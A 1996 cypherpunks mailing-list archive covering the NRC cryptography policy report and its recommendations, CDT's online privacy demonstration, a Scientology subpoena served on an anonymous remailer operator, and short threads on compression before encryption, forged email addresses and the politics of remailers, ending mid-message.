From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 May 1996 21:59:56 +0800
To: alanh@infi.net
Subject: Re: Statistical analysis of anonymous databases
Message-ID: <01I5AWJPQ4XE8Y51NQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"alanh@infi.net"  "Alan Horowitz" 29-MAY-1996 19:09:26.68

>I would ask, is there any known medical gain that has resulted from 
>such a data-base correllation.

>I do not accept a researcher's own statements as to the utility of the work 
>(S)he's done with someone's funding.  Seen too much of it at close 
>quarters...   Nor do I accept reeports in the lay press - these are 
>nothing more than re-gurgitated press releases from PR depts of institutions.

	Medical gain? I was doing some research a bit back (paid for out of
my own pocket, thank you very much) that involved such correlations. We've used
them to revamp some allergy skin testing so that patients don't have to suffer
so many tests.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 May 1996 21:47:55 +0800
To: mclow@owl.csusm.edu
Subject: Re: Where does your data want to go today?
Message-ID: <01I5AWSFT3H48Y51NQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"mclow@owl.csusm.edu"  "Marshall Clow" 29-MAY-1996 19:18:31.60

>* Why encrypt before compression? If the encryption is any good, then the
>encrypted data won't compress much at all. However, compression before
>encryption has its own problems.

	What problems does compression before encryption have? It at least
seems to work for PGP.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 May 1996 21:47:01 +0800
To: cypherpunks@toad.com
Subject: WWW Security
Message-ID: <01I5AWXCU2K28Y51NQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I just noticed that the WWW-security mailing list and group are run
out of Rutgers. What opinions do people have on the current drafts, references
to which can be found at
http://www.ietf.cnri.reston.va.us/html.charters/wts-charter.html?

	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Thu, 30 May 1996 19:41:15 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Clipper III analysis
In-Reply-To: <add251951f021004f0e4@[205.199.118.202]>
Message-ID: <Pine.3.89.9605300346.A3647-0100000@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


	Tim:

On Wed, 29 May 1996, Timothy C. May wrote:

> The issue with digital signatures is who _signed_ a document, not who
> _wrote_ a document.

	For legal contracts and electronic cheques, yes.

	I was thinking of other uses for digital signatures, where
	being able to authenticate who wrote the document is the
	issue.

        xan

        jonathon
        grafolog@netcom.com


	

**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 31 May 1996 02:38:53 +0800
To: John Young <jya@pipeline.com>
Subject: Re: NRC crypto policy report to be released Thursday
In-Reply-To: <199605300317.DAA09263@pipe2.t1.usa.pipeline.com>
Message-ID: <Pine.3.89.9605300507.A19836-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


>From a friend who got a copy of the NRC report yesterday evening:

  > The report is very good.

-Declan


On Thu, 30 May 1996, John Young wrote:

> Date: Thu, 30 May 1996 03:17:40 GMT
> From: John Young <jya@pipeline.com>
> To: Declan McCullagh <declan@well.com>
> Cc: cypherpunks@toad.com
> Subject: Re: NRC crypto policy report to be released Thursday
> 
> The initial September 14, 1994 announcement of the NRC National
> Cryptography project is at: 
>  
>  
>      http://www.wpi.edu/~ryant/ncp.html 
>  
>  
> It describes the program and lists committee members absolutely certain to
> deny GAK tomorrow, trust them. 
>  
>  
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 31 May 1996 03:09:24 +0800
To: cypherpunks@toad.com
Subject: NSA's role in Digital Telephony bill...
Message-ID: <v03006f06add33401a789@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


C'punks,

I had dinner with another cypherpunk, Peter Cassidy, and he said that he
just finished something for the Sacremento Bee's "Forum" section, which
talks about the NSA's involvement in the Digital Telephony bill.

Those of you who get the Bee might want to fill us in on the details,
whenever the article. He said that the article might go to the wires, so we
might see it elsewhere...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Fri, 31 May 1996 06:38:27 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Where does your data want to go today?
In-Reply-To: <01I5AWSFT3H48Y51NQ@mbcl.rutgers.edu>
Message-ID: <v03007002add37b0a637f@[206.126.100.99]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:47 AM -0700 5/30/96, E. ALLEN SMITH wrote:
>From:	IN%"mclow@owl.csusm.edu"  "Marshall Clow" 29-MAY-1996 19:18:31.60
>
>>* Why encrypt before compression? If the encryption is any good, then the
>>encrypted data won't compress much at all. However, compression before
>>encryption has its own problems.
>
>	What problems does compression before encryption have? It at least
>seems to work for PGP.
>
Most compression schemes put a header/index on the front of the compressed data.
This makes recognizing the correct decryption very simple.

Call it a limited "known plaintext" situation.


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We don't have to take it; never have, never will.
Gonna shake it, gonna break it; let's forget it: better still" --The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: modemac@netcom.com (Modemac)
Date: Fri, 31 May 1996 07:12:23 +0800
To: cypherpunks@toad.com
Subject: Scientology subpoenas operator of "freezone" anon remailer
Message-ID: <199605301622.JAA06658@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Path: netcom.com!ixnews1.ix.netcom.com!howland.reston.ans.net!swrinde!newsfeed.internetmci.com!cdc2.cdc.net!news.texas.net!nntp.primenet.com!news.cais.net!bofh.dot!news.his.com!news.lightlink.com!light.lightlink.com!homer
From: "Homer W. Smith" <homer@light.lightlink.com>
Newsgroups: alt.religion.scientology,alt.religion.scientology.xenu,comp.org.eff.talk,misc.legal
Subject: Body of Subpoena (fwd)
Date: Wed, 29 May 1996 15:12:09 -0400
Organization: ART MATRIX - LIGHTLINK
Lines: 28
Distribution: inet
Message-ID: <Pine.SUN.3.91.960529151032.12441B-100000@light.lightlink.com>
NNTP-Posting-Host: light.lightlink.com
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
To: Multiple recipients of list IAP <IAP@VMA.CC.ND.EDU>, 
    Remailer Operators List <Remailer-Operators@c2.org>
Xref: netcom.com alt.religion.scientology:185032 comp.org.eff.talk:85083 misc.legal:174678

 
     DOCUMENTS AND THINGS TO BE PRODUCED
 
     1.) All documents relating to the posting, the header of which is
attached hereto as Exhibit A, which was made through the anonymous
remailer, freezone.remailer, including, without limitation, the identity
of the person or persons who made the posting. 
 
     2.) All documents relating to logs or other records kept by the
computer of any individuals who sent messages through freezone.remailer at
the time the Exhibit A posting was made. 
 
     3.) All documents relating to how records are kept by the
freezone.remailer computer of the source of postings made or messages send
through the computer. 
 
     Exhibit A is the header as received by netcom.com of Scamizdat #3,
posted on April 1st 1995. 
 
     Homer


------------------------------------------------------------------------------
Homer Wilson Smith     News, Web, Telnet      Art Matrix - Lightlink
(607) 277-0959         SunOS 4.1.4 Sparc 20   Internet Access, Ithaca NY
homer@lightlink.com    info@lightlink.com     http://www.lightlink.com



--
                Reverend Modemac (modemac@netcom.com)
   First Online Church of "Bob"      "There is no black and white."
 PGP Key Fingerprint: 47 90 41 70 B4 5B 06 90 7B 38 4E 11 8A ED 80 DF
               URL: http://www.tiac.net/users/modemac/
      (FINGER modemac@netcom.com for a FREE SubGenius Pamphlet!)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Fri, 31 May 1996 07:09:50 +0800
To: cypherpunks@toad.com
Subject: Policy Post 2.21 - Your Privacy Online: CDT Unveils Demo & Clearinghouse
Message-ID: <v02140b08add3586ae4fd@[204.157.127.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 21
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 21                         May 30, 1996

 CONTENTS: (1) Your Privacy Online - CDT Unveils Demonstration and
               Clearinghouse
           (2) Join Rep. White Wed 6/5 At HotWired to Discuss the Internet
               Caucus, the CDA, and other Internet Policy Issues
           (3) Subscription Information
           (4) About CDT, contacting us

  ** This document may be redistributed freely with this banner in tact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
-----------------------------------------------------------------------------

(1) Your Privacy Online - CDT Unveils Demonstration & Clearinghouse

Many people surf the World Wide Web with an illusion of anonymity,
believing that their activities are unobserved and that they can explore
the Internet without leaving a trail.  In reality, this is not the case.

During the normal course of using the Internet, a great deal of personally
revealing information is routinely generated, collected, and stored.  Most
of this information is collected for purposes of system maintenance,
billing, or other necessary functions.  But a sophisticated marketer,
determined hacker, or law enforcement official can put together a detailed
profile of your online activities, personal tastes, interests, habits and
vices with relative ease.

Today, the Center for Democracy and Technology unveiled an interactive
privacy demonstration and privacy policy clearinghouse on our World Wide
Web site. The demonstration is located at

                    http://www.cdt.org/privacy/

The goals of the demonstration are two fold:

1. To educate the public about the extent to which personal information
   is automatically revealed online, and

2. To begin to make available examples of privacy and information usage
   policies that give people greater knowledge of and control over the
   personal information revealed online.  The current focus of this
   "Privacy Clearinghouse" is centered on commercial online service
   providers (ie, America Online, CompuServe, Prodigy, Microsoft).

Future updates of the clearinghouse will include information on Internet
Service Providers, content providers, and web browser software.  Future
updates will also explore the extent that users can employ various
technological solutions to control the collection and disclosure of personal
information.

FEDERAL TRADE COMMISSION TO HOLD HEARINGS ON ONLINE PRIVACY

On June 4 and 5, the Federal Trade Commission (FTC) will hold hearings to
explore online privacy issues.  The FTC is particularly interested in
exploring privacy protecting technologies which empower users to exercise
more control over the collection and use of personally identifiable
information online.

CDT has been invited to present testimony at the hearings.  Testimony and
other background information on the FTC hearings will be available at CDT's
web page at the end of next week. Details on the hearings are available at
http://www.ftc.gov/.

WHY SHOULD NETIZENS CARE ABOUT THIS ISSUE?

Although it may not seem like it, someone is following you through
cyberspace.  Every time you retrieve a file, view an image, send an email
message or jump to a new web site, a record is created somewhere on the
Net.

While much of this information may never be used, it can be, and you have
little control over it.  In the hands of a marketer with a powerful
computer, or the government, it is possible to build a detailed profile of
your tastes and preferences by monitoring your online activities.

The information can be used to send you unsolicited email or snail mail, to
call you, or to even put you on a list of people likely to support a
particular political candidate.  A single piece of information about you
can support a tremendous range of activities.  For example, if your
repeated visits to web sites containing information on cigarettes results
in free samples, coupons, or even email to you about a new tobacco product,
you may not be concerned.  However, if your visits to these web sites
result in escalating insurance premiums due to categorization as a smoker -
now you're beginning to get concerned.

HOW PERSONAL INFORMATION IS COLLECTED ONLINE

Web sites and Web browsers
--------------------------

Your personal information (including your hobbies, political and product
interests and ways to contact you, such as your email address) can be
collected by web sites in two ways: directly or indirectly.

* PASSIVE RECORDING OF TRANSACTIONAL INFORMATION:  The transactional
  information revealed in the normal course of surfing the net reveals a
  great deal of information about your online activities. When you visit
  a particular web site, for example, the webmaster can determine what
  files, pictures, or other information you are most interested in (and
  what you ignored), how long you examined a particular page, image or
  file, where you came from, where you went to.

  Web servers collect transactional information in order to allow the
  system operator to perform necessary system maintenance, auditing, and
  other essential system functions.  However, when correlated with other
  sources of personal information, including marketing databases, phone
  books, voter registration lists, etc, a detailed profile of your
  online activities can be created without your knowledge or consent.

* COOKIES: Additionally, many web browsers contain a feature called
  "cookies," or client-side persistent information.  Cookies allows any
  web site to store information about your visit to that site on your
  hard drive.  Every time you return to that site, "cookies" will read
  your hard drive to find out if you've been there before. (The Privacy
  Demonstration has a link to a site that utilizes cookies.)

* DIRECT DISCLOSURE OF PERSONAL INFORMATION: A growing number of web
  sites offer users the ability to register with the site.  In many
  cases, registration brings real, important benefits, such as access to
  special areas, timely information, discounts, etc.  While registration
  or other mechanisms by which users divulge personal information to a
  web site provide some obvious benefits to a users, it also provides
  the site's operator with a detailed picture of how you use the site.

Regardless of how the information is obtained, a great deal of personally
identifiable information is revealed in the normal course of surfing the
web.

Commercial Online Service Providers
-----------------------------------

Commercial online service providers are configured in a variety of ways,
but generally, little personally identifiable information is revealed to
Internet sites visited directly from an online service.

If you subscribe to a commercial online service, your service provider has
access to lots of information about your online activities.  These records
are generated in the normal course of using the service, and are important
for billing and maintenance purposes.  However, not all services treat the
use and disclosure of this information the same way.

Please visit The Center for Democracy and Technology's Clearinghouse on
Privacy Policies (http://www.cdt.org/privacy/) for a detailed description of
the information practices of the major commercial online services.

Future updates of the clearinghouse will focus on other Internet entities,
such as browsers, content providers, and Internet service providers.

------------------------------------------------------------------------
(2) JOIN CONGRESSMAN RICK WHITE (R-WA) LIVE ONLINE TO TALK ABOUT THE
    INTERNET CAUCUS, THE CDA, AND TAKE YOUR QUESTIONS

Congressman Rick White (R-WA) will be live online at HotWired on Wednesday
June 5 at 9:00 pm ET to discuss his efforts to encourage better
communication between members of Congress and the Internet community, his
plans for the Congressional Internet Caucus, and other topics.
Representative White will also answer questions from Netizens.

DETAILS ON THE EVENT

* Wednesday June 5, 9 - 10 pm ET (6 pm Pacific) on HotWired

   URL: http://www.hotwired.com/wiredside/

To participate, you must be a registered HotWired member (there
is no charge for registration).  You must also have RealAudio(tm) and
a telnet application properly configured to work with your browser.

Please visit http://www.hotwired.com/wiredside/ for information on how
you can easily register for Hotwired and obtain RealAudio.

Wednesday's forum is another in a series of planned events, and is part
of a broader project coordinated by CDT and the Voters Telecommunications
Watch (VTW) designed to bring the Internet Community into the debate and
encourage members of Congress to work with the Net.community on vital
Internet policy issues.

Transcripts from last week's discussion with Senator Leahy are available at
http://www.cdt.org/crypto/.  Events with other members of Congress working
on Internet Policy Issues are currently being planned. Please check
http://www.cdt.org/ for announcements of future events

------------------------------------------------------------------------
(3) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
more than 9,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------
(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.21                                           5/30/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 31 May 1996 08:14:06 +0800
To: cypherpunks@toad.com
Subject: NRC Cryptography Report: The Text of the Recommendations
Message-ID: <199605301742.KAA17655@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Recommendation 1:  No law should bar the manufacture, sale, or use of
any form of encryption within the United States.

Recommendation 2:  National cryptography policy should be developed by
the executive and legislative branches on the basis of open public
discussion and governed by the rule of law.

Recommendation 3:  National cryptography policy affecting the
development and use of commercial cryptography should be more closely
aligned with market forces.

Recommendation 4:  Export controls on cryptography should be
progressively relaxed but not eliminated.

	4.1 -- Products providing confidentiality at a level that
	meets most general commercial requirements should be easily
	exportable.  Today, products with encryption capabilities that
	incorporate 56-bit DES provide this level of confidentiality
	and should be easily exportable.

	4.2 -- Products providing stronger confidentiality should be
	exportable on an expedited basis to a list of approved
	companies if the proposed product user is willing to provide
	access to decrypted information upon legally authorized request.

	4.3 -- The U.S. government should streamline and increase the
	transparency of the export licensing process for cryptography.

Recommendation 5:  The U.S. government should take steps to assist law
enforcement and national security to adjust to new technical realities
of the information age.

	5.1 -- The U.S. government should actively encourage the use of
	cryptography in nonconfidentiality applications such as user
	authentication and integrity checks.   

	5.2 -- The U.S. government should promote the security of the
	telecommunications networks more actively.  At a minimum, the
	U.S. government should promote the link encryption of cellular
	communications and the improvement of security at telephone
	switches.

	5.3 -- To better understand how escrowed encryption might
	operate, the U.S. government should explore escrowed
	encryption for its own uses.  To address the critical
	international dimensions of escrowed communications, the U.S.
	government should work with other nations on this topic.

	5.4 -- Congress should seriously consider legislation that
	would impose criminal penalties on the use of encrypted
	communications in interstate commerce with the intent to
	commit a federal crime.

[Page 28 of the "Overview and Recommendations".  There's a lot
 more discussion of each of these in the whole overview, which should
 be up on the web late today at www2.nas.edu/cstbweb/.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 31 May 1996 08:38:59 +0800
To: cypherpunks@toad.com
Subject: Re: NRC crypto policy report to be released Thursday
Message-ID: <199605301757.KAA20667@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The San Jose Mercury News has the top business section article:

ON-LINE SECRECY WINS BACKING
Without it there could be havoc, panel says

Basically the report says the US will get more protection by using strong
crypto to secure its networks and systems than by keeping week crypto and
allowing LEAs to read comm.  The report describes GAK as "an untested,
unproven technology that should not be foisted on the public until it is
proven in extensive field use by the government."

A quote: 

"We believe government policy should support the broad use of
cryptography." ... "We believe it presents problems for the legitimate
concerns of national security and law enforcement.  But we also point out
that strong cryptography is needed because of the proliferation of
computer-based crimes, that it would deal with national security issues by
protecting vital public networks." - Kenneth W. Dam, Chairman


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Fri, 31 May 1996 10:20:02 +0800
To: cypherpunks@toad.com
Subject: NRC's CRISIS report: Chairman's opening statement
Message-ID: <199605301801.LAA25779@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



                             OPENING STATEMENT

                                KENNETH DAM

               Max Pam Professor of American and Foreign Law
                     University of Chicago Law School
                                    and
          Chair, Committee to Study National Cryptography Policy

    News Conference on Cryptography's Role in Securing the Information
                                  Society

                            National Press Club
                             Washington, D.C.
                               May 30, 1996

                                    ***

  Good morning.  In this age of telecommunications and lightning-speed
  advances in computing, keeping private information private gets tougher
  all the time.  Without proper safeguards, personal financial
  transactions, medical records, corporate secrets such as bidding
  information and proprietary research reports may be compromised by
  criminals and corporate spies.  Without proper safeguards, crucial
  information systems such as those of the banking system and the public
  switched telecommunications network may be vulnerable to intrusion by
  terrorists, curious computer hackers, and unfriendly foreign governments.

       One of the best ways to protect electronic information is through
  encryption, which is the use of mathematical formulas to scramble
  information into digital codes.  Once of concern only to spies and the
  military, cryptography has now become a vital tool for protecting the
  legitimate interests of  the nation's businesses and the privacy of its
  citizens.  This change has created a dilemma for the U.S. government
  because encryption also can be used in a wide range of illegitimate
  activities.  Drug dealers, terrorists, and other criminals can use
  cryptography to thwart even legally authorized search and surveillance by
  law enforcement officials; foreign governments can encrypt information
  that the U.S. needs to protect its national security.  Now the federal
  government -- which in the past has sought to restrict the spread of
  encryption --  must weigh the pros and cons of promoting broader use of
  cryptography.

       The National Research Council was asked by Congress to provide
  policy makers with guidance in making this assessment. Our study
  committee was made up of individuals with expertise in many relevant
  fields: technical expertise in computers, communications, and
  cryptography; policy experience in law enforcement, intelligence, civil
  liberties, national security, diplomacy, and international trade;
  business experience in telecommunications and computer hardware and
  software, as well as in protecting information in the for-profit and
  not-for-profit sectors.  It was formed to examine the appropriate balance
  among various national security, law enforcement, business, and privacy
  interests.

       Our committee's broad conclusion is that the advantages of
  cryptography in safeguarding information outweigh the possible
  disadvantages of making apprehension and prosecution of criminals more
  difficult.  Thus, we believe that federal policies should promote rather
  than discourage the use of encryption.  For example, current export
  controls impede the use of strong encryption by U.S. firms with foreign
  customers and suppliers as well as reducing the availability of strong
  encryption domestically. The government needs to make it easier for U.S.
  companies operating internationally to use strong encryption, and for
  U.S. technology vendors to develop and sell cryptography products both in
  this country and abroad.  Indeed, maintaining world leadership for U.S.
  information technology vendors is an important contribution to national
  security, as well as being important to the economy.

       Furthermore, the development of products with encryption should be
  driven largely by market forces rather than by government-imposed
  requirements or standards.  There are no legal limits on the kinds of
  encryption that presently can be sold in the United States and  we
  strongly endorse the idea that no law should bar the manufacture, sale,
  or use of any form of encryption within the United States.

       We do not believe that by adopting such a course the government
  would necessarily be choosing the interests of business and individuals
  over those of national security and law enforcement.  We say this for two
  reasons.  First, availability of encryption technologies will benefit law
  enforcement and national security.  Here's how: by making economic
  espionage more difficult, cryptography supports law enforcement.  By
  protecting elements of the civilian infrastructure such as banking,
  telecommunications, and air traffic control networks, cryptography
  safeguards national security.

       The second reason is that current national policy -- which
  discourages the use of cryptography despite its many valuable
  applications -- can at most delay encryption's spread.  Already, the use
  of such technologies is growing, and in the long run, we believe
  widespread non-governmental use of cryptography in the United States and
  abroad is inevitable.  The government should recognize this changing
  reality and help law enforcement and national security authorities
  develop the new technical capabilities they will need to conduct
  investigations and surveillance in a world in which information will be
  more protected and even unencrypted communications will be harder to
  read.

       Our report also urges that the government should explore escrowed
  encryption rather than the aggressive promotion that is the case today.
  Encrypted information is unintelligible to anyone lacking the keys to
  unlock the digital code.  In escrowed encryption, the decoding key would
  be held by a trusted third-party organization or institution.  This is
  attractive to law enforcement agencies because with a court order, they
  could obtain the key and unlock even the most unbreakable code.  However,
  escrowed encryption is relatively untried and many unresolved issues
  remain, ranging from the liability of these third parties to the
  magnitude of the risk incurred by companies trusting these third parties
  with the keys to their sensitive business plans and trade secrets.

       Rather than aggressively promoting escrowed encryption, our
  committee believes that the government should explore escrowed encryption
  for its own purposes as a way of gaining operational experience with this
  technology and making it more useful to the commercial sector.  Even when
  that occurs, we say that adoption of escrowed encryption or of any other
  specific technology or standard by the commercial sector should be
  voluntary and based on business needs, not government pressure.

            To make it easier for U.S. companies with foreign customers and
  suppliers to protect their information with the best encryption
  technologies, the committee believes that export controls should be
  progressively relaxed, though not eliminated. Right now federal law makes
  it hard to export strong encryption technology.  This helps protect the
  government's ability to gather foreign intelligence.  However, it also
  makes it more difficult for U.S. technology vendors to produce and sell
  cryptography products both here and overseas, and it limits what's
  available here because software companies are reluctant to develop
  different products for U.S. and foreign markets.

       And we call on the executive and legislative branches to develop
  national cryptography policy on the basis of open public discussion.  In
  the past, government officials have treated many aspects of cryptography
  policy as "top secret," to be discussed only behind closed doors.  This
  has led to considerable public distrust and resistance, which makes it
  impossible to achieve consensus.

       In our report we point to a number of specific areas such as
  telecommunications and banking where the government should actively
  promote the adoption of encryption. For example, the privacy of the
  cellular phone and the security of the nation's telecommunications
  networks should be enhanced through the use of cryptography.  In the case
  of the cellular phone many people have at home, the digital signals sent
  between the cell phone and the cell's ground station could be encrypted.
  This would prevent eavesdroppers from listening in on conversations.

       Overall, we believe that adoption of our recommendations would lead
  to enhanced protection and privacy for individuals and businesses in a
  many areas, while also bolstering the international competitiveness of
  U.S. companies.

       My colleagues and I will now entertain questions from the media.
  Before asking a question, please step to an aisle microphone and state
  your name and affiliation.

----------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 31 May 1996 06:37:38 +0800
To: alanh@infi.net (Alan Horowitz)
Subject: Re: Statistical analysis of anonymous databases
In-Reply-To: <Pine.SV4.3.91.960529160838.5354J-100000@larry.infi.net>
Message-ID: <199605301602.LAA13227@homeport.org>
MIME-Version: 1.0
Content-Type: text


The evidence about the dangers of smoking is largely based on huge
data sets where large amounts of information was gathered and sifted
through to eliminate other correlations, until only cigarettes were
left.

Adam


Alan Horowitz wrote:

| I would ask, is there any known medical gain that has resulted from 
| such a data-base correllation.
| 
| I do not accept a researcher's own statements as to the utility of the work 
| (S)he's done with someone's funding.  Seen too much of it at close 
| quarters...   Nor do I accept reeports in the lay press - these are 
| nothing more than re-gurgitated press releases from PR depts of institutions.
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 31 May 1996 11:02:45 +0800
To: gnu@toad.com
Subject: NRC Cryptography Report: One More Recommendation
In-Reply-To: <199605301747.KAA17778@toad.com>
Message-ID: <199605301940.MAA22617@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Sigh.  Add one more Recommendation.  It wasn't on the summary page of
the fax copy I got, but it was in the text of the Report, and is in
the Web page:

Recommendation 6:  The U.S. government should develop a mechanism to
promote information security in the private sector.

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 31 May 1996 01:18:43 +0800
To: Nobody in particular <nobody@nowher.com>
Subject: Re: forged addresses
In-Reply-To: <199605292012.NAA01475@toad.com>
Message-ID: <31AD7B96.7BCD88A1@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Nobody in particular wrote:
> 
> Hi, I'm not sure if there was ever a thread on this, but I was wondering if
> anyone can determine your real email address, if you were to fake it to your
> email client.
> 
> I hope that this doesn't offend anyone, since this is a high traffic list, but
> I was wondering if this would work.  To try it out, I setup my client to think
> I was someone else, and sent myself an email.  I could only figure out what
> ISP it came from.

It has been known for a very long time that email does not identify the
user who sent the mail, only the machine or ISP that it was sent from (which
in this case was Myna Communications).  However, the machine/ISP will have
logs which can identify the user.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: - <guest@guest.com>
Date: Fri, 31 May 1996 08:27:17 +0800
To: cypherpunks@toad.com
Subject: Re: Asendmail Status & Politikal Rant
Message-ID: <31ADD5CE.3769@gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ben Holiday wrote:

<Asendmail Status report deleted>

>On to politiks:
>
>I understand that the entire concpet of this program is a bit
>controversial, and I can accept that.  Personnaly I am not certain exactly
>how to feel about it.  I suppose that I am not thrilled about the idea of
>cloaking the mailer this way, but at the same time I perceive it as an
>evil of requirement.

Yes. Yet another example of Unintended Consequences.
I seem to be hearing that meme more-and-more these days.

>I beleive very strongly that remailers SHOULD exist,
>whether or not the CoS, or the FBI agree; and I am willing to be a bit
>impolite if thats what needs to be. My only hesitation is that I'm afraid
>now might be to soon.

Absolutely, I think no fair observer could say that "we" [I know,
"there's no 'we'"] "started it." Your concern is valid, IMO, but
it should be balanced with the equally-valid fear that later might
be too late. I have said this many times, both privately and in
public, but it bears repeating: "Things are likely to be worse
after the election." Like many here, I am surprised, and somewhat
happy [easy issue for my political party] that the administration
is making GAK3 noises now, and still trying to Newspeak it into
the word "escrow." <"Escrow"-rant resisted to save bandwidth>

...

>Anyway, someone raised the argument that the problem was political, and
>that a technical solution would do more harm than good - maybe you're
>right, I can't see the future, But it seems to me that I read somewhere
>that "Cypherpunks Write Code". This statement is amazingly profound in its
>implications.

You are right, but it all interacts, IMO, in a "team effort."

cypherpunks DO write code, and politico-crypto-punks like me admire
your work greatly.We also talk about it, and try to spread it around
in order to "protect" it. Users are far better off if someone besides
me writes their software, :) but I can help them install PGPetc.
without too much trouble. [Besides, 2/3 of the Cybergate-cypherpunks
seem to write excellent code. I could never compete!]

>Anonymous communication on the net depends on the technical solutions
>embodied in the current remailing software, and cryptography applications.
>If, years ago, the cypherpunks had decided that a publicity campaign,
>political lobbying, and apologizing were the right course of action,
>anonymous speach on the internet would be virtually non-existant today. If
